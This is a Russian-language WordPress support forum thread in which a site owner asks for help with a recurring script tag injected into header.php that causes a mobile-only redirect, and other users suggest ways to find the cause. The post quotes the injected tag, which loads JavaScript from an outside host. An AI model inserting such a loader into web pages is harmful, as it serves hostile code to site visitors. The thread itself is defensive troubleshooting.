• Здравствуйте, Гуру! Нужна помощь.
    Сделала одному знакомому сайт http://www.alibabaru.com/
    Недавно стал появляться script в head. Точнее в файле header.php. Вирусов нет. Почти все плагины отключила.
    Вот такой
    <script type="text/javascript" src="https://safesource.ru/226942.js"></script>
    Моих скромных знаний хватило на понимание, что это вредный плагин/реклама/скрипт, который вызывается при хуке wp_head. Удалила — он снова вылез. Утром появился. Это некий редирект.

    Помогите найти где оно живет. Или направьте на путь истинный в поисках гадости этой.

Просмотр 7 ответов — с 1 по 7 (всего 7)
  • Вирусов нет.

    Судя по признакам — Вы ошибаетесь.

    Или направьте на путь истинный в поисках гадости этой.

    Прежде всего убедиться, что все плагины и темы из оф каталога и имеют свежие версии.
    Проверить на наличие лишних и изменённых файлов и плагины и темы и дистрибутив. (В помощь инструмент «синхронизация» в файлменеджере или спец ПО для этого)
    Убедиться, что не вставлялось никаких рекламных предложений от левых сайтов.

    А какой способ проверки на вирусы порекомендуете? Онлайн-сервисы говорят, что все Ок. Есть варианты понадежнее?

    Рекламных предложений как раз вставлялось. Знакомый этим зарабатывает. Только вставлял в виджет и шаблон страницы. «Левого» сейчас там нет. А мусор где-то поселился. Я уже замучилась это искать. Руки ему оторву))

    Какое ПО посоветуете для проверки?

    Поиск вирусов, малваров, переустановка движка, темы, всех плагинов не дали результата. Код появляется несколько раз в сутки. И уже расползается по серваку — еще 2 сайта страдают мобильным редиректом.
    Помогите понять механизм работы этой гадости. Теперь хук вордпресс здесь точно не при чем. Может проблема в базе данных? Как ее проверить? Что искать?

    Поиск вирусов, малваров, переустановка движка, темы, всех плагинов не дали результата

    Видимо не достаточно тщательно искали. Не удали файлы с уязвимостями (в темах и/или плагинах в тч).

    Помогите понять механизм работы этой гадости.

    Есть уязвимость, через которую изменяется ваш header.php. Она может быть не в одном месте.

    Возможно также использование уязвимостей других сайтов на этом хостинг-аккаунте.

    «Не удали файлы с уязвимостями (в темах и/или плагинах в тч).» не получится.
    Потому что движок/тема/плагины устанавливала заново. От слова вообще — сносила сайт. Заливала выкачанный с оф.сайта новый движок, тему через консоль закачивала и плагины тоже. Все архивы проверяла на вирусы, малвары искала плагинами.

    А есть еще способы поиска? Руками все коды не перебрать. Или хоть примерно: с каким расширением файлы вредоносные, в какие части сайта они обычно проникают. Мне это поможет.

    Алгоритм работы вредоносного кода и его тип по прежнему не ясны. В этом и проблема. Советы в сети тоже не подходят. Много чего пробовала за неделю. Ничего радикально не решает проблему. Хук запрещала. Но скрипт редиректа появляется. При этом работает он только для мобильных устройств и только на мобильном интернете. В сети Wi-Fi не редиректит с телефона.

    Сегодня перенесу сайт на другой сервер. Отдельно от остальных. Исключу внешнюю уязвимость полностью.

    «Не удали файлы с уязвимостями (в темах и/или плагинах в тч).» не получится.
    Потому что движок/тема/плагины устанавливала заново. От слова вообще — сносила сайт.

    А уязвимости могут быть и не только в каталоге сайта.

    А есть еще способы поиска?

    Есть айболит. Но если у Вас всё-всё с оф каталога и не древнее и Вы не вносили изменения в файлы, то вероятность уязвимости в них близка к нулю.
    Но проверить никогда лишним не будет.
    В базе — тоже возможно. Стоит проверить дамп айболитом.

    Могут быть еще а базе данных. Знаю. Спасибо проверю.
    Да, все обновленное полностью. Старая только база. А ОНО стоит снова.

Просмотр 7 ответов — с 1 по 7 (всего 7)
  • Тема «В head появляется script при хуке wp_head» закрыта для новых ответов.